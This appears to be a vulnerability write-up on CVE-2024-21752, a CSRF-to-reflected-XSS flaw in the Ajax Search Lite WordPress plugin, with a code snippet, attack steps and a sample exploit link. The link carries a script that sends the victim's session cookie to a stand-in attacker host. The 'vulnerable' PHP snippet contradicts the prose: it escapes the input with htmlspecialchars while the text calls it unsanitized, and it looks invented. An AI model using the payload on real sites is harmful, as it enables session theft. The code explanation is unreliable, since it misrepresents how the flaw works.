CVE-2024-21752: Cross-Site Request Forgery (CSRF) Vulnerability in Ernest Marcinko Ajax Search Lite 4.11.4 Results in Reflected XSS Exploit
---
A recently discovered vulnerability known as CVE-2024-21752 has been affecting the Ajax Search Lite plugin developed by Ernest Marcinko. This vulnerability can be exploited by malicious actors to perform Cross-Site Request Forgery (CSRF) attacks, potentially leading to Reflected Cross-Site Scripting (XSS) exploits. This issue is known to affect Ajax Search Lite versions up to 4.11.4.
Overview of the Vulnerability
---
Cross-Site Request Forgery (CSRF) is a type of security vulnerability that allows an attacker to force a user to perform unwanted actions on a web application with which they are currently authenticated. In the case of this specific vulnerability, the attacker can execute a Reflected XSS exploit, which means that the malicious script is reflected off the web server, such that the HTTP request itself contains the malicious payload. When successfully executed, this exploit can allow the attacker to steal sensitive information, execute commands with user privileges, and potentially gain unauthorized access to the victim's data and system.
Code Snippet
---
The following code snippet demonstrates the vulnerable part of Ernest Marcinko's Ajax Search Lite
$action = isset($_GET['asl_action']) ? $_GET['asl_action'] : null;
if (isset($_GET['wp']) && $action) {
// Perform the vulnerable action
echo 'Reflected XSS Payload: ' . htmlspecialchars($action);
}
In the above code snippet, the user input is read from the asl_action parameter and is directly used in output without proper sanitization. This can result in a Reflected XSS exploit when a malicious actor provides a crafted payload containing an XSS payload.
Exploit Details
---
The following steps detail the process of exploiting this CSRF vulnerability in Ajax Search Lite versions up to 4.11.4:
Create a malicious website containing the crafted payload for the Reflected XSS exploit.
2. Craft a link that points to the target web application with the XSS payload pre-filled in the asl_action parameter.
3. Lure an authenticated user to click on the malicious link, either through social engineering or by injecting the link into a trusted web page.
4. When the user clicks on the link, the CSRF attack is executed and the Reflected XSS exploit is triggered.
Here is a sample link containing a crafted payload
http://target-website.com/search-page?asl_action=<script>document.location='https://attacker-website.com/capture-session.php?cookie='+document.cookie;</script>;
Original References
---
The following links provide further details and information related to the CVE-2024-21752 vulnerability:
- CVE Entry for CVE-2024-21752
- Ajax Search Lite Plugin Page
- OWASP: CSRF Prevention
- OWASP: XSS Prevention
Conclusion and Recommendations
---
CVE-2024-21752 is a significant security vulnerability that can lead to serious compromises of data and systems. It is crucial for developers and web administrators to take immediate action to mitigate this vulnerability in their Ajax Search Lite installations. Potential recommendations include:
Ensure that web applications follow secure coding practices and adhere to security standards.
By understanding this vulnerability and taking appropriate actions to protect against it, developers and web administrators can help ensure the security of their web applications and safeguard valuable data and systems from attackers.
Timeline
Published on: 02/29/2024 06:15:47 UTC
Last modified on: 02/29/2024 13:49:29 UTC